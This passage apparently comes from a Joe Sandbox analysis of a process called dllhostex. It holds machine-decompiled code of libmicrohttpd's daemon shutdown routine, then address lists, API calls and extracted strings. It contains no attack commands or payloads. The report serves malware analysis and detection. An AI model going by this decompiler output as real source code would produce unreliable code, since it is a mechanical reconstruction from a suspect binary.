                                                																				_t345 = _t347 + 0x10;
                                                																				break;
                                                																			} else {
                                                																				CloseHandle(_t313[0x14]);
                                                																				goto L17;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                																goto L180;
                                                															}
                                                															_push("(NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail))");
                                                															_push(0xbd9);
                                                															_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                															_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                															goto L39;
                                                														}
                                                													} else {
                                                														asm("o16 nop [eax+eax]");
                                                														do {
                                                															__eflags =  *(_t312 + 0xe4) & 0x00000004;
                                                															if(( *(_t312 + 0xe4) & 0x00000004) == 0) {
                                                																goto L108;
                                                															} else {
                                                																__eflags =  *((char*)(_t174 + 0xa6));
                                                																if( *((char*)(_t174 + 0xa6)) == 0) {
                                                																	L111:
                                                																	_t217 =  *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x1872, "Failed to join a thread\n");
                                                																	_t356 = _t344 + 0x10;
                                                																	asm("int3");
                                                																	asm("int3");
                                                																	asm("int3");
                                                																	_push(_t327);
                                                																	_t339 = _t356;
                                                																	_t357 = _t356 & 0xfffffff8;
                                                																	_push(_t265);
                                                																	_push(_t339);
                                                																	_push(_t312);
                                                																	_t322 = _t278;
                                                																	_push(_t300);
                                                																	__eflags = _t322;
                                                																	if(_t322 == 0) {
                                                																		L163:
                                                																		return _t217;
                                                																	} else {
                                                																		 *((char*)(_t322 + 0xc4)) = 1;
                                                																		__eflags =  *((char*)(_t322 + 0xc5));
                                                																		if( *((char*)(_t322 + 0xc5)) == 0) {
                                                																			_t342 =  *(_t322 + 0xb4);
                                                																		} else {
                                                																			_t342 = _t339 | 0xffffffff;
                                                																		}
                                                																		_t288 =  *(_t322 + 0x64);
                                                																		_t274 = __imp__#3;
                                                																		_t308 = DeleteCriticalSection;
                                                																		__eflags = _t288;
                                                																		if(_t288 == 0) {
                                                																			_t218 =  *(_t322 + 0xe4);
                                                																			__eflags = _t218 & 0x00000008;
                                                																			if((_t218 & 0x00000008) == 0) {
                                                																				E0134D150(_t274, _t322, _t293, DeleteCriticalSection);
                                                																				goto L151;
                                                																			} else {
                                                																				__eflags =  *(_t322 + 0x78);
                                                																				if( *(_t322 + 0x78) == 0) {
                                                																					__eflags = _t218 & 0x00002000;
                                                																					if((_t218 & 0x00002000) != 0) {
                                                																						_t288 = _t322;
                                                																						E0134A8B0(_t274, _t322, _t293, DeleteCriticalSection);
                                                																						_t218 =  *(_t322 + 0xe4);
                                                																					}
                                                																					__eflags = _t218 & 0x00000008;
                                                																					if((_t218 & 0x00000008) == 0) {
                                                																						L151:
                                                																						_t220 =  *((intOrPtr*)(_t322 + 0xbc));
                                                																						__eflags = _t220 - 0xffffffff;
                                                																						if(_t220 == 0xffffffff) {
                                                																							L154:
                                                																							_t217 = _t322 + 0x9c;
                                                																							DeleteCriticalSection(_t217);
                                                																						} else {
                                                																							_t226 =  *_t274(_t220);
                                                																							_push( *((intOrPtr*)(_t322 + 0xc0)));
                                                																							__eflags = _t226;
                                                																							if(_t226 != 0) {
                                                																								 *_t274();
                                                																								goto L156;
                                                																							} else {
                                                																								_t228 =  *_t274();
                                                																								asm("sbb eax, eax");
                                                																								__eflags =  ~_t228 + 1;
                                                																								if( ~_t228 + 1 == 0) {
                                                																									L156:
                                                																									_t217 =  *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18de, "Failed to destroy ITC.\n");
                                                																									_t357 = _t357 + 0x10;
                                                																									goto L157;
                                                																								} else {
                                                																									goto L154;
                                                																								}
                                                																							}
                                                																						}
                                                																						goto L158;
                                                																					} else {
                                                																						__eflags =  *((intOrPtr*)(_t322 + 0xbc)) - 0xffffffff;
                                                																						if( *((intOrPtr*)(_t322 + 0xbc)) == 0xffffffff) {
                                                																							L149:
                                                																							_push("false");
                                                																							_push(0x18ce);
                                                																							_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                																							_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                																							goto L165;
                                                																						} else {
                                                																							__imp__#19( *((intOrPtr*)(_t322 + 0xc0)), "e", 1, 0);
                                                																							__eflags = _t218;
                                                																							if(_t218 <= 0) {
                                                																								__imp__#111();
                                                																								__eflags = _t218 - 0x2733;
                                                																								if(_t218 != 0x2733) {
                                                																									 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18c1, "Failed to signal shutdown via inter-thread communication channel");
                                                																									_t357 = _t357 + 0x10;
                                                																								}
                                                																							}
                                                																							_t239 = WaitForSingleObject( *(_t322 + 0x7c), 0xffffffff);
                                                																							__eflags = _t239;
                                                																							if(_t239 != 0) {
                                                																								 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18d3, "Failed to join a thread\n");
                                                																								_t357 = _t357 + 0x10;
                                                																								goto L149;
                                                																							} else {
                                                																								CloseHandle( *(_t322 + 0x7c));
                                                																								goto L151;
                                                																							}
                                                																						}
                                                																					}
                                                																				} else {
                                                																					_push("0 == daemon->worker_pool_size");
                                                																					_push(0x18b7);
                                                																					_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                																					_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                																					goto L165;
                                                																				}
                                                																			}
                                                																		} else {
                                                																			_t244 =  *(_t322 + 0x78);
                                                																			__eflags = _t244 - 1;
                                                																			if(_t244 <= 1) {
                                                																				_push("1 < daemon->worker_pool_size");
                                                																				_push(0x1890);
                                                																				_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                																				_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                																				goto L165;
                                                																			} else {
                                                																				__eflags =  *(_t322 + 0xe4) & 0x00000008;
                                                																				if(( *(_t322 + 0xe4) & 0x00000008) != 0) {
                                                																					_t274 = 0;
                                                																					__eflags = _t244;
                                                																					if(_t244 == 0) {
                                                																						L129:
                                                																						_t274 = 0;
                                                																						__eflags = _t244;
                                                																						if(_t244 != 0) {
                                                																							_t310 = 0;
                                                																							__eflags = 0;
                                                																							do {
                                                																								L112();
                                                																								_t274 = _t274 + 1;
                                                																								_t310 = _t310 + 0x120;
                                                																								__eflags = _t274 -  *(_t322 + 0x78);
                                                																							} while (_t274 <  *(_t322 + 0x78));
                                                																							_t288 =  *(_t322 + 0x64);
                                                																						}
                                                																						_t217 = E0135C9E5(_t288);
                                                																						_t357 = _t357 + 4;
                                                																						__eflags =  *((intOrPtr*)(_t322 + 0xbc)) - 0xffffffff;
                                                																						if( *((intOrPtr*)(_t322 + 0xbc)) == 0xffffffff) {
                                                																							L157:
                                                																							_t274 = __imp__#3;
                                                																							L158:
                                                																							__eflags =  *(_t322 + 0x60);
                                                																							if( *(_t322 + 0x60) == 0) {
                                                																								__eflags = _t342 - 0xffffffff;
                                                																								if(_t342 != 0xffffffff) {
                                                																									_t224 =  *_t274(_t342);
                                                																									__eflags = _t224;
                                                																									if(_t224 != 0) {
                                                																										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x18f3, "Close socket failed.\n");
                                                																										_t357 = _t357 + 0x10;
                                                																									}
                                                																								}
                                                																								E0135C9E5( *((intOrPtr*)(_t322 + 0xf4)));
                                                																								DeleteCriticalSection(_t322 + 0xf8);
                                                																								DeleteCriticalSection(_t322 + 0x84);
                                                																								_t217 = E0135C9E5(_t322);
                                                																							}
                                                																							goto L163;
                                                																						} else {
                                                																							_push("MHD_ITC_IS_INVALID_(daemon->itc)");
                                                																							_push(0x18ab);
                                                																							_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                																							_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                																							goto L165;
                                                																						}
                                                																					} else {
                                                																						_t308 = 0;
                                                																						__eflags = 0;
                                                																						do {
                                                																							 *((char*)(_t308 +  *(_t322 + 0x64) + 0xc4)) = 1;
                                                																							_t246 =  *(_t322 + 0x64);
                                                																							__eflags =  *((intOrPtr*)(_t308 + _t246 + 0xbc)) - 0xffffffff;
                                                																							if( *((intOrPtr*)(_t308 + _t246 + 0xbc)) == 0xffffffff) {
                                                																								L126:
                                                																								__eflags = _t342 - 0xffffffff;
                                                																								if(_t342 == 0xffffffff) {
                                                																									_push("MHD_INVALID_SOCKET != fd");
                                                																									_push(0x189d);
                                                																									_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                																									_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                																									goto L165;
                                                																								} else {
                                                																									goto L127;
                                                																								}
                                                																							} else {
                                                																								__imp__#19( *((intOrPtr*)(_t308 + _t246 + 0xc0)), "e", 1, 0);
                                                																								__eflags = _t246;
                                                																								if(_t246 > 0) {
                                                																									goto L127;
                                                																								} else {
                                                																									__imp__#111();
                                                																									__eflags = _t246 - 0x2733;
                                                																									if(_t246 == 0x2733) {
                                                																										goto L127;
                                                																									} else {
                                                																										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x189a, "Failed to signal shutdown via inter-thread communication channel.");
                                                																										_t357 = _t357 + 0x10;
                                                																										goto L126;
                                                																									}
                                                																								}
                                                																							}
                                                																							goto L180;
                                                																							L127:
                                                																							_t244 =  *(_t322 + 0x78);
                                                																							_t274 = _t274 + 1;
                                                																							_t308 = _t308 + 0x120;
                                                																							__eflags = _t274 - _t244;
                                                																						} while (_t274 < _t244);
                                                																						_t288 =  *(_t322 + 0x64);
                                                																						goto L129;
                                                																					}
                                                																				} else {
                                                																					_push("0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD)");
                                                																					_push(0x1891);
                                                																					_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                																					_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                																					L165:
                                                																					_push(E0135B8FA(2));
                                                																					E012938B0(_t288);
                                                																					E0135D32E(_t288, E0135B8FA(2));
                                                																					E0135EBB9(_t274, _t288, _t293, _t308, _t322);
                                                																					asm("int3");
                                                																					asm("int3");
                                                																					asm("int3");
                                                																					asm("int3");
                                                																					asm("int3");
                                                																					asm("int3");
                                                																					_push(_t322);
                                                																					_t324 = _v44;
                                                																					__eflags = _t324;
                                                																					if(_t324 == 0) {
                                                																						L179:
                                                																						__eflags = 0;
                                                																						return 0;
                                                																					} else {
                                                																						_t237 = _v40;
                                                																						__eflags = _t237 - 6;
                                                																						if(_t237 > 6) {
                                                																							goto L179;
                                                																						} else {
                                                																							switch( *((intOrPtr*)(_t237 * 4 +  &M0134D7B0))) {
                                                																								case 0:
                                                																									goto L179;
                                                																								case 1:
                                                																									return _t324 + 0xb4;
                                                																									goto L180;
                                                																								case 2:
                                                																									__eflags =  *(__esi + 0xe4) & 0x00000008;
                                                																									if(( *(__esi + 0xe4) & 0x00000008) != 0) {
                                                																										__ecx =  *(__esi + 0x64);
                                                																										__eflags = __ecx;
                                                																										if(__ecx != 0) {
                                                																											__edx =  *(__esi + 0x78);
                                                																											 *(__esi + 0xcc) = 0;
                                                																											__eflags = __edx;
                                                																											if(__edx != 0) {
                                                																												__eax = 0;
                                                																												__ecx = __ecx + 0xcc;
                                                																												__eflags = __ecx;
                                                																												do {
                                                																													__eax = __eax +  *__ecx;
                                                																													__ecx = __ecx + 0x120;
                                                																													 *(__esi + 0xcc) = __eax;
                                                																													__edx = __edx - 1;
                                                																													__eflags = __edx;
                                                																												} while (__edx != 0);
                                                																											}
                                                																										}
                                                																										__eax = __esi + 0xcc;
                                                																										_pop(__esi);
                                                																										return __esi + 0xcc;
                                                																									} else {
                                                																										__ecx = __esi;
                                                																										L1();
                                                																										__eax = __esi + 0xcc;
                                                																										_pop(__esi);
                                                																										return __esi + 0xcc;
                                                																									}
                                                																									goto L180;
                                                																								case 3:
                                                																									__eax = __esi + 0xe4;
                                                																									_pop(__esi);
                                                																									return __esi + 0xe4;
                                                																									goto L180;
                                                																								case 4:
                                                																									__eax = __esi + 0xe8;
                                                																									_pop(__esi);
                                                																									return __esi + 0xe8;
                                                																									goto L180;
                                                																							}
                                                																						}
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																	}
                                                																} else {
                                                																	goto L108;
                                                																}
                                                															}
                                                															goto L180;
                                                															L108:
                                                															_t278 = _t174;
                                                															E0134BE20(_t174, _t265, _t278, _t300);
                                                															_t174 =  *(_t312 + 0xc);
                                                															__eflags = _t174;
                                                														} while (_t174 != 0);
                                                														goto L109;
                                                													}
                                                												}
                                                											} else {
                                                												goto L88;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L180;
                                                								L88:
                                                								_t300 =  *(_t300 + 4);
                                                								__eflags = _t300;
                                                							} while (_t300 != 0);
                                                							goto L89;
                                                						}
                                                					} else {
                                                						while(1) {
                                                							_t258 =  *(_t300 + 0xd8);
                                                							__eflags = _t258;
                                                							if(_t258 == 0) {
                                                								break;
                                                							}
                                                							__eflags =  *((char*)(_t258 + 4));
                                                							if( *((char*)(_t258 + 4)) == 0) {
                                                								_push("Initiated daemon shutdown while \"upgraded\" connection was not closed.\n");
                                                								_push(_t312);
                                                								E01351E90();
                                                								_t344 = _t344 + 8;
                                                							}
                                                							 *((char*)( *(_t300 + 0xd8) + 4)) = 1;
                                                							 *((char*)(_t300 + 0xe4)) = 1;
                                                							 *((char*)(_t312 + 0xc7)) = 1;
                                                							_t300 =  *(_t300 + 4);
                                                							__eflags = _t300;
                                                							if(_t300 != 0) {
                                                								continue;
                                                							} else {
                                                								goto L82;
                                                							}
                                                							goto L180;
                                                						}
                                                						 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0x181e, "MHD_stop_daemon() called while we have suspended connections.\n");
                                                						_t344 = _t344 + 0x10;
                                                						goto L96;
                                                					}
                                                				}
                                                				L180:
                                                			}

                                                0x0134af3f
                                                0x0134af42
                                                0x0134af47
                                                0x0134af49
                                                0x0134af4e
                                                0x0134af4e
                                                0x0134af55
                                                0x0134af5e
                                                0x0134af6f
                                                0x0134af6f
                                                0x0134af74
                                                0x0134af77
                                                0x0134af7c
                                                0x0134af7c
                                                0x0134af80
                                                0x0134af85
                                                0x0134af89
                                                0x0134af8f
                                                0x0134af95
                                                0x0134af9b
                                                0x0134afa2
                                                0x0134afa5
                                                0x0134afa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af60
                                                0x0134af61
                                                0x0134af69
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af69
                                                0x0134aeaf
                                                0x0134aebc
                                                0x0134afe6
                                                0x0134afec
                                                0x0134afef
                                                0x0134b004
                                                0x0134b00a
                                                0x00000000
                                                0x0134aec2
                                                0x0134aec5
                                                0x00000000
                                                0x0134aec5
                                                0x0134aebc
                                                0x0134aea4
                                                0x0134ae68
                                                0x00000000
                                                0x0134ae63
                                                0x0134b00d
                                                0x0134b012
                                                0x0134b017
                                                0x0134b01c
                                                0x00000000
                                                0x0134b01c
                                                0x0134d355
                                                0x0134d355
                                                0x0134d360
                                                0x0134d360
                                                0x0134d36a
                                                0x00000000
                                                0x0134d36c
                                                0x0134d36c
                                                0x0134d373
                                                0x0134d3af
                                                0x0134d3c4
                                                0x0134d3ca
                                                0x0134d3cd
                                                0x0134d3ce
                                                0x0134d3cf
                                                0x0134d3d0
                                                0x0134d3d1
                                                0x0134d3d3
                                                0x0134d3d6
                                                0x0134d3d7
                                                0x0134d3d8
                                                0x0134d3d9
                                                0x0134d3db
                                                0x0134d3dc
                                                0x0134d3de
                                                0x0134d6d3
                                                0x0134d6da
                                                0x0134d3e4
                                                0x0134d3e4
                                                0x0134d3eb
                                                0x0134d3f2
                                                0x0134d3f9
                                                0x0134d3f4
                                                0x0134d3f4
                                                0x0134d3f4
                                                0x0134d3ff
                                                0x0134d402
                                                0x0134d408
                                                0x0134d40e
                                                0x0134d410
                                                0x0134d531
                                                0x0134d537
                                                0x0134d539
                                                0x0134d61a
                                                0x00000000
                                                0x0134d53f
                                                0x0134d53f
                                                0x0134d543
                                                0x0134d55e
                                                0x0134d563
                                                0x0134d565
                                                0x0134d567
                                                0x0134d56c
                                                0x0134d56c
                                                0x0134d572
                                                0x0134d574
                                                0x0134d61f
                                                0x0134d61f
                                                0x0134d625
                                                0x0134d628
                                                0x0134d643
                                                0x0134d643
                                                0x0134d64a
                                                0x0134d62a
                                                0x0134d62b
                                                0x0134d633
                                                0x0134d634
                                                0x0134d636
                                                0x0134d64e
                                                0x00000000
                                                0x0134d638
                                                0x0134d638
                                                0x0134d63c
                                                0x0134d63e
                                                0x0134d641
                                                0x0134d650
                                                0x0134d665
                                                0x0134d66b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d641
                                                0x0134d636
                                                0x00000000
                                                0x0134d57a
                                                0x0134d57a
                                                0x0134d581
                                                0x0134d5ff
                                                0x0134d5ff
                                                0x0134d604
                                                0x0134d609
                                                0x0134d60e
                                                0x00000000
                                                0x0134d583
                                                0x0134d592
                                                0x0134d598
                                                0x0134d59a
                                                0x0134d59c
                                                0x0134d5a2
                                                0x0134d5a7
                                                0x0134d5be
                                                0x0134d5c4
                                                0x0134d5c4
                                                0x0134d5a7
                                                0x0134d5cc
                                                0x0134d5d2
                                                0x0134d5d4
                                                0x0134d5f6
                                                0x0134d5fc
                                                0x00000000
                                                0x0134d5d6
                                                0x0134d5d9
                                                0x00000000
                                                0x0134d5d9
                                                0x0134d5d4
                                                0x0134d581
                                                0x0134d545
                                                0x0134d545
                                                0x0134d54a
                                                0x0134d54f
                                                0x0134d554
                                                0x00000000
                                                0x0134d554
                                                0x0134d543
                                                0x0134d416
                                                0x0134d416
                                                0x0134d419
                                                0x0134d41c
                                                0x0134d6db
                                                0x0134d6e0
                                                0x0134d6e5
                                                0x0134d6ea
                                                0x00000000
                                                0x0134d422
                                                0x0134d422
                                                0x0134d42c
                                                0x0134d447
                                                0x0134d449
                                                0x0134d44b
                                                0x0134d4c3
                                                0x0134d4c3
                                                0x0134d4c5
                                                0x0134d4c7
                                                0x0134d4c9
                                                0x0134d4c9
                                                0x0134d4d0
                                                0x0134d4d5
                                                0x0134d4da
                                                0x0134d4db
                                                0x0134d4e1
                                                0x0134d4e1
                                                0x0134d4e6
                                                0x0134d4e6
                                                0x0134d4ea
                                                0x0134d4ef
                                                0x0134d4f2
                                                0x0134d4f9
                                                0x0134d66e
                                                0x0134d66e
                                                0x0134d67a
                                                0x0134d67a
                                                0x0134d67e
                                                0x0134d680
                                                0x0134d683
                                                0x0134d686
                                                0x0134d688
                                                0x0134d68a
                                                0x0134d6a1
                                                0x0134d6a7
                                                0x0134d6a7
                                                0x0134d68a
                                                0x0134d6b0
                                                0x0134d6bf
                                                0x0134d6c8
                                                0x0134d6cb
                                                0x0134d6d0
                                                0x00000000
                                                0x0134d4ff
                                                0x0134d4ff
                                                0x0134d504
                                                0x0134d509
                                                0x0134d50e
                                                0x00000000
                                                0x0134d50e
                                                0x0134d44d
                                                0x0134d44d
                                                0x0134d44d
                                                0x0134d450
                                                0x0134d453
                                                0x0134d45b
                                                0x0134d45e
                                                0x0134d466
                                                0x0134d4ad
                                                0x0134d4ad
                                                0x0134d4b0
                                                0x0134d518
                                                0x0134d51d
                                                0x0134d522
                                                0x0134d527
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d468
                                                0x0134d478
                                                0x0134d47e
                                                0x0134d480
                                                0x00000000
                                                0x0134d482
                                                0x0134d482
                                                0x0134d488
                                                0x0134d48d
                                                0x00000000
                                                0x0134d48f
                                                0x0134d4a4
                                                0x0134d4aa
                                                0x00000000
                                                0x0134d4aa
                                                0x0134d48d
                                                0x0134d480
                                                0x00000000
                                                0x0134d4b2
                                                0x0134d4b2
                                                0x0134d4b5
                                                0x0134d4b6
                                                0x0134d4bc
                                                0x0134d4bc
                                                0x0134d4c0
                                                0x00000000
                                                0x0134d4c0
                                                0x0134d42e
                                                0x0134d42e
                                                0x0134d433
                                                0x0134d438
                                                0x0134d43d
                                                0x0134d6ef
                                                0x0134d6f9
                                                0x0134d6fa
                                                0x0134d70d
                                                0x0134d715
                                                0x0134d71a
                                                0x0134d71b
                                                0x0134d71c
                                                0x0134d71d
                                                0x0134d71e
                                                0x0134d71f
                                                0x0134d720
                                                0x0134d721
                                                0x0134d725
                                                0x0134d727
                                                0x0134d7ab
                                                0x0134d7ab
                                                0x0134d7ae
                                                0x0134d72d
                                                0x0134d72d
                                                0x0134d731
                                                0x0134d734
                                                0x00000000
                                                0x0134d736
                                                0x0134d736
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d744
                                                0x00000000
                                                0x00000000
                                                0x0134d745
                                                0x0134d74f
                                                0x0134d760
                                                0x0134d763
                                                0x0134d765
                                                0x0134d767
                                                0x0134d76a
                                                0x0134d774
                                                0x0134d776
                                                0x0134d778
                                                0x0134d77a
                                                0x0134d77a
                                                0x0134d780
                                                0x0134d780
                                                0x0134d782
                                                0x0134d788
                                                0x0134d78e
                                                0x0134d78e
                                                0x0134d78e
                                                0x0134d780
                                                0x0134d776
                                                0x0134d793
                                                0x0134d799
                                                0x0134d79a
                                                0x0134d751
                                                0x0134d751
                                                0x0134d753
                                                0x0134d758
                                                0x0134d75e
                                                0x0134d75f
                                                0x0134d75f
                                                0x00000000
                                                0x00000000
                                                0x0134d79b
                                                0x0134d7a1
                                                0x0134d7a2
                                                0x00000000
                                                0x00000000
                                                0x0134d7a3
                                                0x0134d7a9
                                                0x0134d7aa
                                                0x00000000
                                                0x00000000
                                                0x0134d736
                                                0x0134d734
                                                0x0134d727
                                                0x0134d42c
                                                0x0134d41c
                                                0x0134d410
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d373
                                                0x00000000
                                                0x0134d375
                                                0x0134d375
                                                0x0134d377
                                                0x0134d37c
                                                0x0134d37f
                                                0x0134d37f
                                                0x00000000
                                                0x0134d360
                                                0x0134d353
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d243
                                                0x0134d23a
                                                0x0134d221
                                                0x00000000
                                                0x0134d249
                                                0x0134d249
                                                0x0134d24c
                                                0x0134d24c
                                                0x00000000
                                                0x0134d204
                                                0x0134d1b0
                                                0x0134d1b0
                                                0x0134d1b0
                                                0x0134d1b6
                                                0x0134d1b8
                                                0x00000000
                                                0x00000000
                                                0x0134d1be
                                                0x0134d1c2
                                                0x0134d1c4
                                                0x0134d1c9
                                                0x0134d1ca
                                                0x0134d1cf
                                                0x0134d1cf
                                                0x0134d1d8
                                                0x0134d1dc
                                                0x0134d1e3
                                                0x0134d1ea
                                                0x0134d1ed
                                                0x0134d1ef
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134d1ef
                                                0x0134d2ce
                                                0x0134d2d4
                                                0x00000000
                                                0x0134d2d4
                                                0x0134d1ac
                                                0x00000000

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,7710A080,?,?,73ECED70), ref: 0134D199
                                                • shutdown.WS2_32(?,00000002), ref: 0134D20C
                                                • send.WS2_32(?,013CDD84,00000001,00000000), ref: 0134D232
                                                • WSAGetLastError.WS2_32 ref: 0134D23C
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0134D286
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0134D28D
                                                • CloseHandle.KERNEL32(?), ref: 0134D29E
                                                • EnterCriticalSection.KERNEL32(?), ref: 0134D2A7
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0134D337
                                                  • Part of subcall function 0134A8B0: EnterCriticalSection.KERNEL32(?,00000000,?,?,0000009C), ref: 0134A8E3
                                                • send.WS2_32(?,013CDAEC,00000001,00000000), ref: 0134D478
                                                • WSAGetLastError.WS2_32 ref: 0134D482
                                                Strings
                                                • 1 < daemon->worker_pool_size, xrefs: 0134D6DB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D6E5
                                                • MHD_stop_daemon() called while we have suspended connections., xrefs: 0134D2B9
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D6EA
                                                • Failed to signal shutdown via inter-thread communication channel, xrefs: 0134D2FF
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D50E
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D527
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D2EB
                                                • MHD_stop_daemon() called while we have suspended connections., xrefs: 0134D2E1
                                                • Failed to join a thread, xrefs: 0134D391
                                                • Failed to join a thread, xrefs: 0134D3AF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D39B
                                                • Initiated daemon shutdown while "upgraded" connection was not closed., xrefs: 0134D1C4
                                                • MHD_INVALID_SOCKET != fd, xrefs: 0134D518
                                                • Failed to signal shutdown via inter-thread communication channel., xrefs: 0134D48F
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134D43D
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D2C3
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D3B9
                                                • MHD_ITC_IS_INVALID_(daemon->itc), xrefs: 0134D4FF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D438
                                                • 0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD), xrefs: 0134D42E
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D499
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D696
                                                • Close socket failed., xrefs: 0134D68C
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D509
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D309
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134D522
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Enter$ErrorLastLeavesend$CloseHandleObjectSingleWaitshutdown
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$0 != (daemon->options & MHD_USE_INTERNAL_POLLING_THREAD)$1 < daemon->worker_pool_size$Close socket failed.$Failed to join a thread$Failed to join a thread$Failed to signal shutdown via inter-thread communication channel$Failed to signal shutdown via inter-thread communication channel.$Initiated daemon shutdown while "upgraded" connection was not closed.$MHD_INVALID_SOCKET != fd$MHD_ITC_IS_INVALID_(daemon->itc)$MHD_stop_daemon() called while we have suspended connections.$MHD_stop_daemon() called while we have suspended connections.$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 1990226287-3708895456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,0000009C), ref: 0134A8E3
                                                • GetTickCount64.KERNEL32 ref: 0134AA02
                                                • __aulldiv.LIBCMT ref: 0134AA1D
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0134AAFC
                                                • send.WS2_32(?,013CEF9C,00000001,00000000), ref: 0134AB1C
